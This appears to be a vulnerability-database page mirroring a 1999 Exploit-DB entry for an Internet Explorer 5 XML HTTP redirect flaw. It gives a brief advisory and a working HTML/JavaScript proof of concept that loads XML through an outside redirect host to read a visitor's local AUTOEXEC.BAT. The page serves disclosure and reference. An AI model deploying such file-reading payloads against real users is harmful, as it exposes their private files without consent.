Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) – XML HTTP Redirect

Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) – XML HTTP Redirect

漏洞ID 1053429 漏洞类型
发布时间 1999-11-22 更新时间 1999-11-22
图片[1]-Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) – XML HTTP Redirect-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) – XML HTTP Redirect-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19637
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
MS IE 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 XML HTTP Redirect Vulnerability

source: http://www.securityfocus.com/bid/815/info

A vulnerability in the method IE5 uses to process XML data may allow a malicious web site owner to read files on a visiting user's computer. A web page may be created that contains an XML object type that contains instructions to read known files on a visitor's local host (and or domain). The IE5 client will allow the XML redirect to access files within its own domain.

Note that if this vulnerability is exploited for IE5 for Unix, the only reported result is that the application will suffer an "Internal Error" and crash. 

<object id="xm" type="text/xml"
data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>
</object>
<SCRIPT>
function f()
{
s=xm.body.innerHTML;
a=window.open();
//alert(s);
a.document.open();
a.document.write("Here is a part of AUTOEXEC.BAT (the error message is
normal):<BR>"+s);
a.document.close();
}
setTimeout("f()",5000);
</SCRIPT>

相关推荐: WebBBS login & password Buffer Overflow Vulnerability

WebBBS login & password Buffer Overflow Vulnerability 漏洞ID 1104526 漏洞类型 Boundary Condition Error 发布时间 1999-11-15 更新时间 1999-11-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享